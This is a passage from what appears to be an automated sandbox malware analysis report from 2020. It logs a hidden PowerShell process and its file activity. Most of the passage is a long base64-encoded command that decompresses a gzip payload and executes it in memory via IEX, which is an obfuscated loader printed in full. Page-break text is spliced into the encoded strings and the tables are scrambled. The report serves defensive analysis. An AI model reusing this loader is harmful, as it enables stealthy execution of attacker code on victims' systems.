QBwADMARgBBAFIAMQBPAEEAagBuADkAVwBhADYANAA4AGUAZABTAHQAcABjA DUAVgBDAGUAUgBkAGcARgBkAEEAQwBlAE4ASABaADkASQBjADYAcABvAFYAO QBPAGcASwA4AEUAdQAvAGcAYQBiAG4ATABwAFEAWgB6AGEAUQBQAHAAUgBWA G4AdAA2AHQAdgB4AGUAVwA2AGoANABYAEkAbwAwAEUASQBkAFUANwB5AHkAS wBiAFkAcAAwADQAZQBWAFEAUABoAEgAWQA2AHEAbwBXAFQASgBVAHYAdgB1A GIAaQAvADAAcABVAGUAdwBrAEoAbQA1AGkAZgBFAEMAcABJAGUAcgA2AHkAe QBBAGkAZwBrAEoAWgBCAGQAZwBHAE4AcAByAFMAagB6AHMASwAxAFQAeQB5A FAAUQBjAFcAbwB0AHQAYgA1ADYANQBvAEwAMgBJAFMAUgAzADcAUABwAFEAY wBXAEkAbwBnAEoANwBDAGoAcwBMAEMAbAA0AGcAeAAzADgAbgAvAG4AaAAxA EcAMABxAGIAUgBXAGEANQArAHUAUQBEAHIAcABRAGkAMABmAHoANgBIAG4AS ABDAG8AcQBvAFIAdQBlAFUAMABmADcAQgA3AGUAegBPAGsAbQBMAFEAbQBHA FYAZwBYAFQAaQBOAEIARABBADkAcABuAE0AbwAwAGUAUABTACsAaAByAFcAd gA0AG4ANAB2ADAAMwA5ADMANQBzAE0AVAArADQAVwBlAGYAMABrAEUAZwA5A EsAYwBSAHgATABaAGEAcQBYAEIASgBKAG8AbwBiAEwANwBSAEgATABCAEQAa wB1AEEAYgBVAFcAWgA2AHMAYQBGAHYAVAA2AHkAawA3AGEAbQBLADYAVgBiA DgASwBOAEYAZgBlAFcASAA2ADkANQB1AHgAbQAxAHoASQAzAFoASABNAEkAd gBnAGwAOQA1ADAAMgBwADIAdQA1ADMANwBkAGUAMgArAFMANQByAGgAMwBjA EEAcwBkAFYAegByADQAMAAzAGoASwB0AHkARwBWAGoAaQBzAGwAYwBxAHQAR QBzAGoAdABOACsAMgBtAGEAMABWADMANwBOAE4ARgB1AEwAcQA2AGMATgBaA FcAMQBJAGMAOQA4AFcANQBqAGkAbwBZAFYATgBhAHIAbQA1AFkAYQAxAHIAd QBkAGUANQBXAEEAbgAxAGYAOAA0ADIAMQA3AE0AUgBsAGIAcgAzAGEAegBkA Copyright null 2020 HUAagBJAGYAUgBVAHYASgBtADEAWgBVAGEAMgAzAHEARgBRAGIAcgB0PAaDgEeA 1W4 of 18 HUAagBJAGYAUgBVAHYASgBtADEAWgBVAGEAMgAzAHEARgBRAGIAcgB0ADEAW gBVAFoAeAAzAFEAdQA3AGwAZQBCADcAVwB0AGMAMABXAGIAbgBXAHMANgA2A HAASgB0AFcAZAA1AFEAUABOAC8ARgBmAHoAeQArAGEAWQBiADkAegBxAGUAU wBXAFAAWQBnAEIAcgB1AHkASgA1ADEANgB2ADIATwBWADUATAB0AEYAdQBkA EUAdQBEAHoANwB2AFkAeQBhAFcAVgB0AHoALwByAFIAbQB1AFkALwBJAHMAb ABzADgAeABXAGQAcgB4ADMAYgBBAFQAZwA5AHoAegBzADIALwBiAHQAWgAxA DkAKwBYAG4ANABkAHUAQwBTAFMAbgBEAEgAKwBsAHUAbgBZADUAVgBiADMAW ABwAHAAUgA3AGYATwAvAG4ASQBkADkAawBmAEQAaAArAGUAbABiAFkAUAA4A E4AVwArAHgAdQA0AGQAZwBJADkAcgB6AEsAegB0AGsAbwB5ADIASgBZAFAAL wBDAHQAcAAyAGQAQQA0AEARgBvAC8AaABUAGUAWQBDAFoAcwB5AFgANwBaAE QALwB1AE4AZQBEAHUAMAB6AFAAQQBoADUAUQAzADcAUgBzAFQANABnAHAAcQ BjAFoAZAB2AFAAQQBLAFkARQA3AE0AWABkAHgAZgB4AHcARQA1AHMATwBzAD EAbwBlAGUAbQArAGMAOABIAC8AawB2ADMAbQA2AFcASgB0AG0AcQBTAHkAQQ BmAG4AcgBSAFYAUwBMAEIAYgA3AHkAeQBiAE4AZAB1AFgAdQBhAGoAMABhAG sASQBuAGQAbQBiAFQALwBvAGsAdgA2AGUAbABNADMASwAyADgAYQBvAE0Acg BUADkAZgB0AHUAOQBxAEkAMAArACsAcwA3AFQAZwA3AG0AcgBOAFIAZQBPAG EAZQAyAGIASQArAGQAUgAzAEMAcABXAHUAWQB6AEQAbgBOAGkAcAAzAHYAcw A3AGcAdgA4AEYAWAA2AEkAagBiADQAQQB0AFEARQBTADEALwArAGEATgBvAG YAcgAzADgAVwBSADgAdgBwAHQAawA4AC8AYgA0AFgAWgBqAHQAdwBGAHIANQ BOADgAWABCADUAQwBUAEMASgA4AHgANwBiAFkAagAxAE0AQgBjAEwANwBBAE 0AagBZAFIAQgBsAGIAYQBUAEYAZQBPAHMAdwBUAGcAYgBNAFUAeABxADYALw B2AEkATAA2AEoAbgB5AGcAUAByAHcATwBvAEQAMwBRADEAWgA4AFYAZAA5AG 4AUgBBADMAQQBWAHkAWQBSAGoATwBOADAAUwBFADYAZwB5AFQAegBBAHMAbg B6ADUANABzAHAAQQBSADAARwBZAGUAbQBsAE0AcwA5AEIAMQBrAHkARgB4AG kARABDAGIAbABaAG4AZwArAC8AZQBmAEkAYgB6ADgAQwBZAGgAZABHAHMAeg BsAEkAbwA5AEsAdQAzAEsAcABWAEYATAAvAHIAMABwAEcANwB0AGQAaABxAG IATgAxAHIAQgAvAE4ANQBkAFcAUQBQAFAASABrADkAQwBZAC8AdQBjAGsANA BvAE0ALwBEAFkARQBYAC8AeAB3AFQAOABjAE8AbQAvAFEANgB2AEEAUwArAG IAcwBFAGIAcgBFAG8AWgBmAHgATQBuAEwAYQBoADEAegBPAGMAdABIAEoAdg B2AEQAMgA4AEkAcQBrAEcAMwBTAFQAYwBFADkASQB6AEcAVgBoAHkAVwBiAH cANQBFAHgANgBxAEgANgBPAEQAVwBRADEAUgArAGcAYwBvADIAKwBvAEEATw BGAFYAUgBmAGsAUwAzAHAAMQA4AEgAcQBxAEcAaQB0AEoAbgA5AEYAZQAwAH gAVgA2AHEAKwBCAFgAZABVADAATABoAEcAVgBUAG8AcwBCAG0AdwBsAE0ASg BjAFYASwBZAFQASQAwAG8AWQA5AHYANABDAFAAYQAvAEEAaQBaAGMATABBAE EAQQA9ACIAKQApADsASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIA BJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAG oAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQ BwAFMAdAByAGUAYQBtACgAJABzACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAH MAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOg BEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAG QAKAApADsA Imagebase: 0x810000 File size: 232960 bytes MD5 hash: F3BDBE3BB6F734E357235F4D5898582D Has administrator privileges: false Programmed in: C, C++ or other language Reputation: high

File Activities

Source File Path Access Attributes Options Completion Count Address Symbol

Analysis Process: powershell.exe PID: 6724 Parent PID: 6712

General

Start time: 09:27:45 Start date: 27/08/2020 Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Wow64 process (32bit): true Commandline: powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagB lAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEM AbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgB pAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAVwBiAFg AUABhAE8AQgBEACsASABIADYARgBQAG0AVABHADkAaABRAG8AQwBiAGsAMAA 5AEMAWQB6ADUAZAAzAG0AZwBOAEMAWQBKAEwAUwBVAFkAWQBRAHMAZwA0AG0 AeABRAEoASQBOADUAdAByAC8AZgBpAHMAYgBVADMAcABOADcAagBwAHoAbAB 4AGsAbQBzAHIAUwA3ADIAbgAzADIAMgBWADMAWgBWAEIAWgBzAHkAVAAwAGk AZQA4AHkAaABxAFAAQgBJAHUAZgBCAFkAZwBDADUAegB1AGYATQBHAHMAeQB TADYAUgBSACsAMABuAEIAcwBHAFIASwBwAHQAdABaAGoATwBxAFoAeQB1AE8 AUwBOAFQANwBEAGkAYwBDAG8ASAArAHoASgAwAE4ATQBNAGMAcgBwAEoAOQB IAG0ARQA5AFgAegBBAGwAOQBtAGsAZgBKAGgAeABLAGsAVABzAGkAcABjAFg AYQBXAE8AMAB1ADIAdwBrAEIAZwBsADAANABEAEwATAAyAEkAVABsAGQAVQB MAHAAZwBqADQAQwBKADkAWABGADIAdgBHADIAeQBGAHYAVwBEAHkALwBuADA AOQA1AEoAdwBHAE0AdgAwAHUAdABxAG0AcwBDAGsARgBYAE0AOQArAGoAUQB qAGYAUQBWAC8AUwAwAG8ASgB3AFcANwBtAFoATABTAGkAVAA2AEUANQAxAFA AaQAyADIAZgB6AGIAQgAvAEUASQB2AHIAbQBDAHcAZwBvAEcAcgBnAHEATAB NAHUASQAxAGgARgBVAEwAVABYAHYAaQBkADEANwBjAHMAWAB6AFIAZwBYAEw AaQBiAEYANQBpAGIARQB2AHQAQQAxAE8AeABhAFMAcgBvAHEATwA3ADIAcwB Copyright null 2020 Page 15 of 18 HACsAbQBhAG8AQwA0AGYAeABtAHUAcABhAHoAeQBPAGMAQwBlAGIASwA0AHA ATQBYAGwAQwArAEwARAA0AG4AMwAvAGMAVAA1AFgAdQBxADcAWgBoAHcAaQB tADYAOAB4AHgAUABGADYAawBNAHAAcQBxAHEATgByAHMAQgB3AEEATgB0AFU AVQBRAHkAMgBQAHgAdQBxACsAOABXAFMAQwBQAGgAeQA5AHUAUQA4AEQANgB hADEAbwAwAFEAbwBrADUAVwB4AHQAVQB4ADUANQBoAEkAcQBpAGkAUQBQAEg AcAAvAGYAVQBCAFQAVgBOAFEAUABxAEMAdQBXAGEAQQBFADUAegBLAGsAQQB jAG8AOAB3AFgAMABJAHYAWgBNADkAZgBNAGcAOQBQADAAOAAyAEIAMwAvAHE AdAAyAEoAMwBxAGYAYgBEAE4AeABmAFYAZABKAFAAbABVAEIAcQBJAEwAbQB SAFAAMwBEAGkAVgArAEQAbwBKAGIAeABKAHoAVQBFADQAUAAzAGwALwBRAGk ANABEAC8AbgA0AGkAbQBKAEgANwBsAG4AdQBCAHEAZwA3ADEANgBSAHgATAB PAHAAVwBBADcAdwBsAFgAYwAyAGQAbgA0ADIAUgBKAEkAUgA1ADkAdwBJAFM AWAA2AE4AMgBpAFUAaAA3ADEAdwBBAGsAcwBHAFkAOQBWAE8AbwBjADgAcAB NAGIAawBlADMANwBTAGEAegBOAE4AawBYAC8AVgAwAEUAVwBtAGQAZABCAEo AMAA1AFAANgBjAFkAdgBHAGoAOAB4AHoASgByAGsAegBJADMAZABnAGoAOQB xAGYAegBrAEwAUABkAHkAaABYADUANgA5AFgAUQA0AE8ANgBYAGsAQQBiAGM AWQBCAFgASABzAGsASQByADcAKwBVAE0AKwByADYATgBNAEcAagBtAEkAbgA xAHcAVQA5AGQATwB4AHgAUQBwADMARgBBAFIAMQBPAEEAagBuADkAVwBhADY ANAA4AGUAZABTAHQAcABjADUAVgBDAGUAUgBkAGcARgBkAEEAQwBlAE4ASAB aADkASQBjADYAcABvAFYAOQBPAGcASwA4AEUAdQAvAGcAYQBiAG4ATABwAFE AWgB6AGEAUQBQAHAAUgBWAG4AdAA2AHQAdgB4AGUAVwA2AGoANABYAEkAbwA wAEUASQBkAFUANwB5AHkASwBiAFkAcAAwADQAZQBWAFEAUABoAEgAWQA2AHE AbwBXAFQASgBVAHYAdgB1AGIAaQAvADAAcABVAGUAdwBrAEoAbQA1AGkAZgB FAEMAcABJAGUAcgA2AHkAeQBBAGkAZwBrAEoAWgBCAGQAZwBHAE4AcAByAFM AagB6AHMASwAxAFQAeQB5AFAAUQBjAFcAbwB0AHQAYgA1ADYANQBvAEwAMgB JAFMAUgAzADcAUABwAFEAYwBXAEkAbwBnAEoANwBDAGoAcwBMAEMAbAA0AGc AeAAzADgAbgAvAG4AaAAxAEcAMABxAGIAUgBXAGEANQArAHUAUQBEAHIAcAB RAGkAMABmAHoANgBIAG4ASABDAG8AcQBvAFIAdQBlAFUAMABmADcAQgA3AGU AegBPAGsAbQBMAFEAbQBHAFYAZwBYAFQAaQBOAEIARABBADkAcABuAE0AbwA wAGUAUABTACsAaAByAFcAdgA0AG4ANAB2ADAAMwA5ADMANQBzAE0AVAArADQ AVwBlAGYAMABrAEUAZwA5AEsAYwBSAHgATABaAGEAcQBYAEIASgBKAG8AbwB iAEwANwBSAEgATABCAEQAawB1AEEAYgBVAFcAWgA2AHMAYQBGAHYAVAA2AHk AawA3AGEAbQBLADYAVgBiADgASwBOAEYAZgBlAFcASAA2ADkANQB1AHgAbQA xAHoASQAzAFoASABNAEkAdgBnAGwAOQA1ADAAMgBwADIAdQA1ADMANwBkAGU AMgArAFMANQByAGgAMwBjAEEAcwBkAFYAegByADQAMAAzAGoASwB0AHkARwB WAGoAaQBzAGwAYwBxAHQARQBzAGoAdABOACsAMgBtAGEAMABWADMANwBOAE4 ARgB1AEwAcQA2AGMATgBaAFcAMQBJAGMAOQA4AFcANQBqAGkAbwBZAFYATgB hAHIAbQA1AFkAYQAxAHIAdQBkAGUANQBXAEEAbgAxAGYAOAA0ADIAMQA3AE0 AUgBsAGIAcgAzAGEAegBkAHUAagBJAGYAUgBVAHYASgBtADEAWgBVAGEAMgA zAHEARgBRAGIAcgB0ADEAWgBVAFoAeAAzAFEAdQA3AGwAZQBCADcAVwB0AGM AMABXAGIAbgBXAHMANgA2AHAASgB0AFcAZAA1AFEAUABOAC8ARgBmAHoAeQA rAGEAWQBiADkAegBxAGUAUwBXAFAAWQBnAEIAcgB1AHkASgA1ADEANgB2ADI ATwBWADUATAB0AEYAdQBkAEUAdQBEAHoANwB2AFkAeQBhAFcAVgB0AHoALwB yAFIAbQB1AFkALwBJAHMAbABzADgAeABXAGQAcgB4ADMAYgBBAFQAZwA5AHo AegBzADIALwBiAHQAWgAxADkAKwBYAG4ANABkAHUAQwBTAFMAbgBEAEgAKwB sAHUAbgBZADUAVgBiADMAWABwAHAAUgA3AGYATwAvAG4ASQBkADkAawBmAEQ AaAArAGUAbABiAFkAUAA4AE4AVwArAHgAdQA0AGQAZwBJADkAcgB6AEsAegB 0AGsAbwB5ADIASgBZAFAALwBDAHQAcAAyAGQAQQA0AEARgBvAC8AaABUAGUA WQBDAFoAcwB5AFgANwBaAEQALwB1AE4AZQBEAHUAMAB6AFAAQQBoADUAUQAz ADcAUgBzAFQANABnAHAAcQBjAFoAZAB2AFAAQQBLAFkARQA3AE0AWABkAHgA ZgB4AHcARQA1AHMATwBzADEAbwBlAGUAbQArAGMAOABIAC8AawB2ADMAbQA2 AFcASgB0AG0AcQBTAHkAQQBmAG4AcgBSAFYAUwBMAEIAYgA3AHkAeQBiAE4A ZAB1AFgAdQBhAGoAMABhAGsASQBuAGQAbQBiAFQALwBvAGsAdgA2AGUAbABN ADMASwAyADgAYQBvAE0AcgBUADkAZgB0AHUAOQBxAEkAMAArACsAcwA3AFQA ZwA3AG0AcgBOAFIAZQBPAGEAZQAyAGIASQArAGQAUgAzAEMAcABXAHUAWQB6 AEQAbgBOAGkAcAAzAHYAcwA3AGcAdgA4AEYAWAA2AEkAagBiADQAQQB0AFEA RQBTADEALwArAGEATgBvAGYAcgAzADgAVwBSADgAdgBwAHQAawA4AC8AYgA0 AFgAWgBqAHQAdwBGAHIANQBOADgAWABCADUAQwBUAEMASgA4AHgANwBiAFkA agAxAE0AQgBjAEwANwBBAE0AagBZAFIAQgBsAGIAYQBUAEYAZQBPAHMAdwBU AGcAYgBNAFUAeABxADYALwB2AEkATAA2AEoAbgB5AGcAUAByAHcATwBvAEQA MwBRADEAWgA4AFYAZAA5AG4AUgBBADMAQQBWAHkAWQBSAGoATwBOADAAUwBF ADYAZwB5AFQAegBBAHMAbgB6ADUANABzAHAAQQBSADAARwBZAGUAbQBsAE0A cwA5AEIAMQBrAHkARgB4AGkARABDAGIAbABaAG4AZwArAC8AZQBmAEkAYgB6 ADgAQwBZAGgAZABHAHMAegBsAEkAbwA5AEsAdQAzAEsAcABWAEYATAAvAHIA MABwAEcANwB0AGQAaABxAGIATgAxAHIAQgAvAE4ANQBkAFcAUQBQAFAASABr ADkAQwBZAC8AdQBjAGsANABvAE0ALwBEAFkARQBYAC8AeAB3AFQAOABjAE8A bQAvAFEANgB2AEEAUwArAGIAcwBFAGIAcgBFAG8AWgBmAHgATQBuAEwAYQBo ADEAegBPAGMAdABIAEoAdgB2AEQAMgA4AEkAcQBrAEcAMwBTAFQAYwBFADkA SQB6AEcAVgBoAHkAVwBiAHcANQBFAHgANgBxAEgANgBPAEQAVwBRADEAUgAr AGcAYwBvADIAKwBvAEEATwBGAFYAUgBmAGsAUwAzAHAAMQA4AEgAcQBxAEcA aQB0AEoAbgA5AEYAZQAwAHgAVgA2AHEAKwBCAFgAZABVADAATABoAEcAVgBU AG8AcwBCAG0AdwBsAE0ASgBjAFYASwBZAFQASQAwAG8AWQA5AHYANABDAFAA YQAvAEEAaQBaAGMATABBAEEAQQA9ACIAKQApADsASQBFAFgAIAAoAE4AZQB3 AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUA cgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBz AHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACgAJABzACwAWwBJAE8A LgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBv AG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4A UgBlAGEAZABUAG8ARQBuAGQAKAApADsA Imagebase: 0xb00000 File size: 430592 bytes MD5 hash: DBA3E6449E97D4E3DF64527EF7012A10 Has administrator privileges: false Programmed in: .Net C# or VB.NET Reputation: high

File Activities

Source File Path Access Attributes Options Completion Count Address Symbol C:\Windows\system32\catroot read data or list device directory file | object name collision 1 6D265B28 unknown directory | synchronous io synchronize non alert | open for backup ident | open reparse point C:\Windows\system32\catroot2 read data or list device directory file | object name collision 1 6D265B28 unknown directory | synchronous io synchronize non alert | open for backup ident | open reparse point C:\Users\user read data or list device directory file | object name collision 1 6E4BCF06 unknown directory | synchronous io synchronize non alert | open for backup ident | open reparse point C:\Users\user\AppData\Roaming read data or list device directory file | object name collision 1 6E4BCF06 unknown directory | synchronous io synchronize non alert | open for backup ident | open reparse point C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\Sta read attributes | device synchronous io success or wait 1 6E681926 CreateFileW rtupProfileData-Interactive synchronize | non alert | non generic write directory file

Source Old File Path New File Path Completion Count Address Symbol

File Written

Source File Path Offset Length Value Ascii Completion Count Address Symbol C:\Users\user\AppData\Local\Mi unknown 64 40 00 00 01 65 00 00 @...e...... success or wait 1 6E7876FC WriteFile crosoft\Windows\PowerShell\StartupProfileData-Interactive 00 00 00 00 00 0b 00 ...... 00 00 04 00 00 00 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 C:\Users\user\AppData\Local\Mi unknown 40 48 00 00 02 03 00 00 H...... <@.^...L."My.. success or wait 11 6E7876FC WriteFile crosoft\Windows\PowerShell\StartupProfileData-Interactive 00 00 00 00 00 01 00 .:...... 00 00 3c 40 b0 5e e7 8d bf 4c b2 22 4d 79 98 9c a7 3a 03 00 00 00 0e 00 20 00 C:\Users\user\AppData\Local\Mi unknown 32 4d 69 63 72 6f 73 6f Microsoft.PowerShell.Cons success or wait 11 6E7876FC WriteFile crosoft\Windows\PowerShell\StartupProfileData-Interactive 66 74 2e 50 6f 77 65 oleHost 72 53 68 65 6c 6c 2e 43 6f 6e 73 6f 6c 65 48 6f 73 74 C:\Users\user\AppData\Local\Mi unknown 1 00 . success or wait 7 6E7876FC WriteFile crosoft\Windows\PowerShell\StartupProfileData-Interactive C:\Users\user\AppData\Local\Mi unknown 4 40 00 00 03 @... success or wait 1 6E7876FC WriteFile crosoft\Windows\PowerShell\StartupProfileData-Interactive C:\Users\user\AppData\Local\Mi unknown 60 00 0e 80 00 01 0e 80 ...... success or wait 1 6E7876FC WriteFile crosoft\Windows\PowerShell\StartupProfileData-Interactive 00 02 0e 80 00 03 0e ...... [email protected].@...@..@ 80 00 04 0e 80 00 05 @. 0e 80 00 06 0e 80 00 07 0e 80 00 08 0e 80 00 09 0c 80 00 0a 0e 80 00 54 01 40 00 47 01 40 00 da 00 40 00 0e 40 40 01

File Read

Source File Path Offset Length Completion Count Address Symbol C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe.config unknown 4095 success or wait 1 6E495705 unknown C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe.config unknown 8173 end of file 1 6E495705 unknown

Copyright null 2020 Page 17 of 18 Source File Path Offset Length Completion Count Address Symbol C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4095 success or wait 1 6E495705 unknown C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 6135 success or wait 1 6E495705 unknown C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4097 success or wait 1 6E495705 unknown C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4098 success or wait 1 6E495705 unknown C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 7976 success or wait 1 6E495705 unknown C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152 unknown 176 success or wait 1 6E3F03DE ReadFile fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll.aux C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe.config unknown 4095 success or wait 1 6E49CA54 ReadFile C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe.config unknown 8173 end of file 1 6E49CA54 ReadFile C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4095 success or wait 1 6E49CA54 ReadFile C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 6135 success or wait 1 6E49CA54 ReadFile C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4097 success or wait 1 6E49CA54 ReadFile C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4098 success or wait 1 6E49CA54 ReadFile C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 7976 success or wait 1 6E49CA54 ReadFile C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f unknown 900 success or wait 1 6E3F03DE ReadFile 1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll.aux C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7e unknown 620 success or wait 1 6E3F03DE ReadFile efa3cd3e0ba98b5ebddbbc72e6\System.ni.dll.aux C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe.config unknown 4095 success or wait 1 6E495705 unknown C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe.config unknown 8173 end of file 1 6E495705 unknown C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe.config unknown 4095 success or wait 1 6E495705 unknown C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe.config unknown 8173 end of file 1 6E495705 unknown C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b2 unknown 748 success or wait 1 6E3F03DE ReadFile 19d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll.aux C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf4 unknown 748 success or wait 1 6E3F03DE ReadFile 9f6405#\ccc7c82770f93d1392abde4be3a80378\Microsoft.Management.Infrastructure.ni.dll.aux C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4095 success or wait 1 6E495705 unknown C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 6135 success or wait 1 6E495705 unknown C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4097 success or wait 1 6E495705 unknown C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4098 success or wait 1 6E495705 unknown C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 7976 success or wait 1 6E495705 unknown C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4121 success or wait 1 6E495705 unknown C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4253 success or wait 1 6E495705 unknown C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 8171 end of file 1 6E495705 unknown C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Config unknown 864 success or wait 1 6E3F03DE ReadFile uration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll.aux

Disassembly